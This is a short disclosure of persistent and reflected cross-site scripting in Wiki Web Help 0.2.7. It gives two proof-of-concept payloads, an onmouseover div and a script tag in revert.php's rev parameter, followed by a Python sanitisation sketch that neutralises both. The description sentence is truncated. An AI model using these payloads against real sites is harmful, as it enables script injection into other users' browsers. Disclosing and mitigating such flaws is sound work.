Software: Wiki Web Help 0.2.7
Vulnerability: Persistent/Reflected Cross-site Scripting
Tested On: Windows Vista + XAMPP
Date: 7/1/2010
Description
A vulnerability in Wiki Web Help 0.2.7 can be exploited to .
Exploit
Persistent: Event attributes are not removed from user submitted HTML elements.

Reflected: The rev query string field of revert.php does not HTML encode user submitted data.
Proof of Concept
Persistent: <div onmouseover="alert(0)" style="margin:-500px;width:9999px;height:9999px;position:absolute;"></div>

Reflected: http://localhost/wwh/revert.php?rev=%3Cscript%3Ealert(0)%3C/script%3E
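
Mitigation sketch for both cases, as an added example that is not Wiki Web Help's own code (it is written in Python rather than the application's PHP). The allowlist contents and the names `sanitize_html` and `render_rev` are assumptions; the two inputs are the proof-of-concept strings above.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

# Inputs taken from the proof of concept on this page.
PERSISTENT_POC = ('<div onmouseover="alert(0)" style="margin:-500px;width:9999px;'
                  'height:9999px;position:absolute;"></div>')
REFLECTED_POC = "http://localhost/wwh/revert.php?rev=%3Cscript%3Ealert(0)%3C/script%3E"

# Hypothetical allowlist (an assumption): tag -> attributes permitted on it.
# No URL-bearing attribute is listed; adding one would require scheme validation.
ALLOWED = {"div": {"class"}, "p": set(), "b": set(), "i": set(), "pre": set()}

class AllowlistSanitizer(HTMLParser):
    """Re-serialise user HTML, keeping only allowlisted tags and attributes."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED:
            return  # unknown element dropped; its text is still emitted, escaped
        kept = [f' {name}="{escape(value or "", quote=True)}"'
                for name, value in attrs if name in ALLOWED[tag]]
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data, quote=False))

def sanitize_html(fragment):
    """Persistent case: strip onmouseover=, style= and anything else unlisted."""
    parser = AllowlistSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)

def render_rev(url):
    """Reflected case: HTML-encode the decoded rev value before writing it out."""
    rev = parse_qs(urlsplit(url).query).get("rev", [""])[0]
    return escape(rev, quote=True)

if __name__ == "__main__":
    print(sanitize_html(PERSISTENT_POC))
    print(render_rev(REFLECTED_POC))
```

An allowlist is used instead of a filter for `on*` attributes because the `style` attribute in the persistent proof of concept is what stretches the element across the page, and it would pass an event-attribute filter untouched.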